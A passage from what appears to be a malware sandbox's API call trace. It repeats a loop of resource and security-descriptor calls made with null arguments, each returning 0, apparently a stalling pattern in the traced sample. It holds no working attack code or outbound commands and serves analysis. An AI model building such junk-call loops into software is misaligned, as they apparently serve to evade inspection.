lpdwRevision=0x209de4c) returned 0 [0219.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.957] LockResource (hResData=0x0) returned 0x0 [0219.957] FreeResource (hResData=0x0) returned 0 [0219.958] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.958] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.958] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.958] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.958] LockResource (hResData=0x0) returned 0x0 [0219.958] FreeResource (hResData=0x0) returned 0 [0219.958] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.958] LockResource (hResData=0x0) returned 0x0 [0219.958] FreeResource (hResData=0x0) returned 0 [0219.958] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.958] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.958] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.958] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.958] LockResource (hResData=0x0) returned 0x0 [0219.958] FreeResource (hResData=0x0) returned 0 [0219.958] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.958] LockResource (hResData=0x0) returned 0x0 [0219.958] FreeResource (hResData=0x0) returned 0 [0219.958] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.958] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.958] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.958] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.958] LockResource (hResData=0x0) returned 0x0 [0219.958] FreeResource (hResData=0x0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.959] LockResource (hResData=0x0) returned 0x0 [0219.959] FreeResource (hResData=0x0) returned 0 [0219.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.959] LockResource (hResData=0x0) returned 0x0 [0219.959] FreeResource (hResData=0x0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.959] LockResource (hResData=0x0) returned 0x0 [0219.959] FreeResource (hResData=0x0) returned 0 [0219.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.959] LockResource (hResData=0x0) returned 0x0 [0219.959] FreeResource (hResData=0x0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.959] LockResource (hResData=0x0) returned 0x0 [0219.959] FreeResource (hResData=0x0) returned 0 [0219.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.959] LockResource (hResData=0x0) returned 0x0 [0219.959] FreeResource (hResData=0x0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.959] LockResource (hResData=0x0) returned 0x0 [0219.959] FreeResource (hResData=0x0) returned 0 [0219.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.960] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.960] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.960] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.960] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.960] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.960] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.960] LockResource (hResData=0x0) returned 0x0 [0219.960] FreeResource (hResData=0x0) returned 0 [0219.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.961] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.961] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.961] LockResource (hResData=0x0) returned 0x0 [0219.961] FreeResource (hResData=0x0) returned 0 [0219.961] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.961] LockResource (hResData=0x0) returned 0x0 [0219.961] FreeResource (hResData=0x0) returned 0 [0219.961] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.961] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.961] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.961] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.961] LockResource (hResData=0x0) returned 0x0 [0219.961] FreeResource (hResData=0x0) returned 0 [0219.961] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.961] LockResource (hResData=0x0) returned 0x0 [0219.961] FreeResource (hResData=0x0) returned 0 [0219.961] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.961] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.961] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.961] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.961] LockResource (hResData=0x0) returned 0x0 [0219.961] FreeResource (hResData=0x0) returned 0 [0219.961] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.961] LockResource (hResData=0x0) returned 0x0 [0219.961] FreeResource (hResData=0x0) returned 0 [0219.961] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.961] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.961] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.962] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.962] LockResource (hResData=0x0) returned 0x0 [0219.962] FreeResource (hResData=0x0) returned 0 [0219.962] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.962] LockResource (hResData=0x0) returned 0x0 [0219.962] FreeResource (hResData=0x0) returned 0 [0219.962] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.962] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.962] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.962] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.962] LockResource (hResData=0x0) returned 0x0 [0219.962] FreeResource (hResData=0x0) returned 0 [0219.962] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.962] LockResource (hResData=0x0) returned 0x0 [0219.962] FreeResource (hResData=0x0) returned 0 [0219.962] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.962] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.962] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.962] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.962] LockResource (hResData=0x0) returned 0x0 [0219.962] FreeResource (hResData=0x0) returned 0 [0219.962] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.962] LockResource (hResData=0x0) returned 0x0 [0219.962] FreeResource (hResData=0x0) returned 0 [0219.962] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.962] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.962] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.962] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.963] LockResource (hResData=0x0) returned 0x0 [0219.963] FreeResource (hResData=0x0) returned 0 [0219.963] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.963] LockResource (hResData=0x0) returned 0x0 [0219.963] FreeResource (hResData=0x0) returned 0 [0219.963] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.963] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.963] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.963] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.963] LockResource (hResData=0x0) returned 0x0 [0219.963] FreeResource (hResData=0x0) returned 0 [0219.963] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.963] LockResource (hResData=0x0) returned 0x0 [0219.963] FreeResource (hResData=0x0) returned 0 [0219.963] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.963] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.963] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.963] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 